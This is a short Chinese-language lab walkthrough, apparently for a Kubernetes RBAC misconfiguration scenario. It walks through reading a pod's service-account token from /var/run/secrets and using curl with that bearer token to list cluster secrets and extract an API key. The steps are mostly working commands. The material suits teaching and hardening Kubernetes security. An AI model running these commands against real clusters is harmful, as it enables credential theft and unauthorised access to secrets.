RBAC least privileges misconfiguration

RBAC 最低特权配置错误

  • 由于Kubernetes默认情况下将所有secretstokensservice accounts信息都存储在一个固定的目录。直接访问这个目录,查找敏感的信息:
1
cd /var/run/secrets/kubernetes.io/serviceaccount/

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_14-56-54_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 要指向内部 API 服务器主机名,我们可以从环境变量中导出它
1
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
  • 设置 ServiceAccount 令牌的路径
1
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
  • 设置命名空间值
1
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
  • 读取 ServiceAccount token
1
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
  • 指向 ca.crt 路径,以便我们可以在 curl 请求中查询时使用它
1
export CACERT=${SERVICEACCOUNT}/ca.crt
  • 现在我们可以使用令牌和构造的查询来探索 Kubernetes API
1
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-03-01_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 要查询默认命名空间中的可用机密,请运行以下命令
1
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-03-37_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 查询特定于命名空间的秘密
1
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets
  • 从secrets中获取k8svaulapikey值
1
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey 

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-04-54_d41d8cd98f00b204e9800998ecf8427e.jpg